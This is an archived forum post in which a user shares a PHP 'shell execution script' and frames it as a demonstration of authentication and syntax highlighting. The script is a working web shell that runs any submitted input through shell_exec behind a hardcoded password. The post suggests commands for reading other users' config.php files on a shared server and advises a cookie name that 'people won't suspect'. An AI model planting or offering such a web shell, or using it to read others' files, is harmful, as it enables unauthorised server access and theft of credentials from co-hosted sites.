[advanced search]
Results from the most recent live auction are here.
21 members in the live chat room. Join Chat!
Register Rules & FAQ NP$ Store Active Threads Mark Forums Read
Go Back   NamePros.Com > Design and Development > Programming > CODE
Reload this Page Shell execution script
User Name
Password

Old 07-26-2005, 06:05 PM   · #1
unclekyky
New Member
 
Trader Rating: (0)
Join Date: Sep 2003
Posts: 13
NP$: 23.00 (Donate)
unclekyky is an unknown quantity at this point
Shell execution script
just a really simple, somewhat pointless, script that _can_ be used to view other peoples PHP files (on the same server).

im sharing it to demonstrate a simple authentication method, highlighting php files, and using shell_exec.

some usefull linux shell comands are:
ls /home/bob/public_html/
cat /home/bob/public_html/config.php

the script should work as is with the password "pass" (no quotes).
PHP Code:
<?php
// what is the password?
$pass = 'pass';
// cookie name - consider changing this to something that people won't suspect
$cookie_name = 'wjcookie';
// md5() the password
$md5_pass = md5($pass);

// checks to see if the cookie is set
if (!isset($_COOKIE[$cookie_name]))
{
    //if the cookie isn't set and the form hasn't been submitted: echo the form
    if (!isset($_POST['conf']))
    {
        echo "Password: <form action='{$_SERVER['PHP_SELF']}' method='post'>
                <input type='password' name='password'><br />
                <input type='hidden' name='conf'>
                <input type='submit'>
                </form>";
        die();
    }
    //if the cookie isn't set and the form has been submitted: check to see if the passwords match
    else
    {
        if ($_POST['password'] == $pass)
        {
            setcookie($cookie_name, $md5_pass, time()+3600, '/');
        }
        else
        {
            die('Wrong password.');
        }
    }
}
// if the cookie is set but the passwords don't match, then die
if (isset($_COOKIE[$cookie_name]))
{
    if ($_COOKIE[$cookie_name] != $md5_pass)
    {
        die("Invalid cookie information.");
    }
}
// if the passwords in the cookie match echo the form for the shell command
echo "<h2>Shell Execution Script</h2>
        <form method='post' action='{$_SERVER['PHP_SELF']}'>
        <input type='text' name='input' size='90'><br />
        <input type='submit'>
        </form>
        <br />";
// die if the form hasn't been submitted
if (!isset($_POST['input']))
{
    die();
}
// get the output from the command that was executed
$output = shell_exec($_POST['input']);
// this checks to see if the file is PHP then highlights it.
if (preg_match("/<?php/i", $output) || preg_match('/\.php/i', $_POST['input']))
{
    highlight_string($output);
    die();
}
// if not PHP then it echos it out to the screen
echo nl2br(htmlspecialchars($output));
// command wasn't successfull
if ($output == NULL)
{
    echo "No output.";
}
?>


Please register or log-in into NamePros to hide ads
unclekyky is offline   Reply With Quote
Closed Thread

NamePros is a revenue sharing forum.
« What can make such Javascript Tree Menu ? | .htaccess: Prevent users from seeing private directories! »

Thread Tools

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
vB code is On
Smilies are On
[IMG] code is Off
HTML code is Off
Forum Jump

Similar Threads
Thread Thread Starter Forum Replies Last Post
60.000 Templates, scripts, fonts, banners etc. $9.95 atkims Web Development Wanted 19 11-16-2004 09:48 AM
Domain Rating Script for Sale : $200.00 - only 10 scripts will be sold fonzerelli_79 Scripts For Sale 3 08-31-2003 08:41 AM

Site Sponsors
Hunting Moon Get Your Site Linked at LinkedKeywords.com
Advertise your business at NamePros
All times are GMT -7. The time now is 09:19 PM.

Advertise At NamePros - Contact Us - NamePros.Com - Archive -Privacy Statement -Top

Powered by: vBulletin Copyright ©2000 - 2008, Jelsoft Enterprises Ltd.
Search Engine Friendly URLs by vBSEO 2.4.0